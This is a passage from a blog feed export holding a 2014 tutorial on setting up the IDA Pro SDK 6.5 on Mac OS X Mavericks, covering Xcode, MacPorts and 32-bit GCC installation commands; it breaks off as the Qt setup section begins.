tag:blogger.com,1999:blog-264802252024-03-08T00:18:37.016+01:00newsoft's tech blognewsoft Technical Blog (loosely updated, unfortunately ...)newsofthttp://www.blogger.com/profile/04331742158137961313noreply@blogger.comBlogger29125tag:blogger.com,1999:blog-26480225.post-66071637206799658502014-05-05T14:14:00.001+01:002014-05-05T19:24:28.604+01:00Setting up IDA SDK 6.5 on Mac OS X 10.9 (Mavericks)<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">(This blog post is a wrap-up of the thread I started on </span><a href="https://www.hex-rays.com/forum/viewtopic.php?f=8&t=3554" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">Hex-Rays support forum</span></a><span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">)</span></div>
<h2 style="line-height: 1.15; margin-bottom: 0pt; margin-top: 10pt;">
<span style="background-color: transparent; color: black; font-family: 'Trebuchet MS'; font-size: 21px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Prerequisites</span></h2>
<b id="docs-internal-guid-aecea9c7-cc7c-b859-4bd9-b34b96d190af" style="font-weight: normal;"><br /></b>
<br />
<ul style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; list-style-type: disc; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Mac OS X 10.9 (Mavericks)</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; list-style-type: disc; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">IDA Pro 6.5</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; list-style-type: disc; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">IDA SDK (downloadable from </span><a href="https://www.hex-rays.com/products/ida/support/download.shtml" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">here</span></a><span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> - the password should have been provided to you while purchasing IDA Pro)</span></div>
</li>
</ul>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">$ md5 idasdk65.zip</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">MD5 (idasdk65.zip) = 4afa4c11ae8480f0753d5b2f87b61213</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Note: if you would like to perform all the steps below within a virtual machine, it is perfectly legal to do so. Just use </span><a href="http://kb.vmware.com/selfservice/microsites/search.do?language=en_US&cmd=displayKC&externalId=2056798" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">VMWare Fusion 6</span></a><span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> to create a new virtual machine </span><span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: italic; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">from the local recovery partition</span><span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">. The same trick should work with Parallel, but I did not test it.</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<h2 style="line-height: 1.15; margin-bottom: 0pt; margin-top: 10pt;">
<span style="background-color: transparent; color: black; font-family: 'Trebuchet MS'; font-size: 21px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Installing GCC from MacPorts</span></h2>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">IDA SDK would only compile with </span><span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: italic; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">32-bit GCC</span><span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">.</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Unfortunately, OS X 10.9 and XCode 5 </span><a href="https://developer.apple.com/library/ios/documentation/DeveloperTools/Conceptual/WhatsNewXcode/Articles/xcode_5_0.html#//apple_ref/doc/uid/TP40012953-SW8" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">do not provide GCC anymore</span></a><span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">, as Apple completely switched to LLVM (</span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">gcc</span><span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> command is only an alias). For the rest of this post, I will rely upon GCC 4.7 provided by </span><a href="http://www.macports.org/" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">MacPorts</span></a><span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> 2.2.1. Feel free to explore other options, such as </span><a href="http://brew.sh/" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">HomeBrew</span></a><span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">. </span><span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: italic; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">However</span><span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">, to download and build GCC from source, MacPorts requires a compiler! Therefore the proper installation order is:</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">1. Install Apple C(++) compiler</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">At this point, “full” XCode 5 install is required. XCode call be downloaded from the AppStore, or from </span><a href="https://developer.apple.com/downloads/index.action" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">Apple Developers site</span></a><span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> (the former requires a valid AppStore account, whereas the latter only requires free registration). </span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">After install, do not forget to get command-line tools also:</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">$ xcode-select --install</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">… and to accept XCode EULA from command-line, in case you never started the GUI:</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">$ sudo xcodebuild -license</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Confirm that LLVM has been properly installed:</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">$ gcc --version</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Configured with: --prefix=/Library/Developer/CommandLineTools/usr --with-gxx-include-dir=/usr/include/c++/4.2.1</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Apple LLVM version 5.1 (clang-503.0.40) (based on LLVM 3.4svn)</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Target: x86_64-apple-darwin13.1.0</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Thread model: posix</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Confirm that SDK has been properly installed (and keep that path, you will need it later on):</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">$ xcrun --sdk macosx --show-sdk-path</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">/Applications/Xcode.app/Contents/Developer/Platforms/MacOSX.platform/Developer/SDKs/MacOSX10.9.sdk</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Note: it is possible to install command-line tools only by simply typing </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">gcc</span><span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> in a terminal, or to get them from </span><a href="https://developer.apple.com/downloads/index.action" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">Apple Developers</span></a><span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">. </span><span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: italic; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">However</span><span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">, this will not install the OS 10.9 SDK required by IDA SDK later on.</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">2. Get MacPorts from </span><a href="http://www.macports.org/" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">www.macports.org</span></a><span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> (installer version 2.2.1 was the most recent available at the time of writing).</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">You might need to log out and in again to get </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">/opt/local/bin</span><span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> in your PATH.</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">3. Install GCC from MacPorts.</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">You will need to get the 32-bit flavor of GCC. This can be achieved through several means:</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">$ port install gcc47 +i386</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">… will only install the 32-bit version of GCC</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">$ port install gcc47 +universal</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">… will install all archs specified in </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">/opt/local/etc/macports/macports.conf</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">In any case, you can grab a coffee. Building GCC from source could take </span><span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: italic; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">hours</span><span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">.</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">You might get the following warning if you did not install the “full” XCode suite. It seems that you can safely ignore for now, but remember that you will need OS 10.9 SDK later on anyway.</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">$ sudo port install gcc47 +universal</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: red; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Warning: xcodebuild exists but failed to execute</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: red; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Warning: Xcode does not appear to be installed; most ports will likely fail to build.</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">---> Computing dependencies for gcc47</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">…</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">---> Updating database of binaries: 100.0%</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">---> Scanning binaries for linking errors: 100.0%</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">---> No broken files found.</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">4. Do not forget to alias GCC to the MacPorts version.</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">$ port select --list gcc</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Available versions for gcc:</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">mp-gcc47</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">none (active)</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">$ port select --set gcc mp-gcc47</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Selecting 'mp-gcc47' for 'gcc' succeeded. 'mp-gcc47' is now active.</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">$ gcc --version</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">gcc (MacPorts gcc47 4.7.3_3+universal) 4.7.3</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Copyright (C) 2012 Free Software Foundation, Inc.</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">This is free software; see the source for copying conditions. There is NO </span><span style="font-family: 'Courier New'; font-size: 15px; line-height: 1.15; white-space: pre-wrap;">warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<h2 style="line-height: 1.15; margin-bottom: 0pt; margin-top: 10pt;">
<span style="background-color: transparent; color: black; font-family: 'Trebuchet MS'; font-size: 21px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Setting up Qt</span></h2>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">IDA SDK depends on Qt, version 4.8.4. Qt header files are required for compiling “graphical” plugins.</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">The “stock” </span><a href="http://download.qt-project.org/official_releases/qt/4.8/" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">Qt 4 source distribution</span></a><span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> will not build on Mac OS X 10.9:</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
